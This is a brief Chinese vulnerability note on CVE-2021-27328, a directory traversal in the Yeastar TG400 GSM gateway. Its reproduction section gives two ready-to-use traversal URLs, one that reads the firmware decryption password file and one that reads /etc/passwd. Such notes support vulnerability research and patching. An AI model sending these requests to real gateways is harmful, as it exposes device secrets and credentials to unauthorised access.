# 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328
## 漏洞描述
朗视 TG400 GSM 网关存在目录遍历 ,攻击者可以通过漏洞获取敏感信息
## 漏洞影响
> [!NOTE]
>
> 朗视 TG400 GSM 网关
## 漏洞复现
暂无FOFA语句及固件设备复现
“`
获取固件解密密码
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
/etc/passwd:
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
“`
## 参考文章
https://github.com/SQSamir/CVE-2021-27328
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容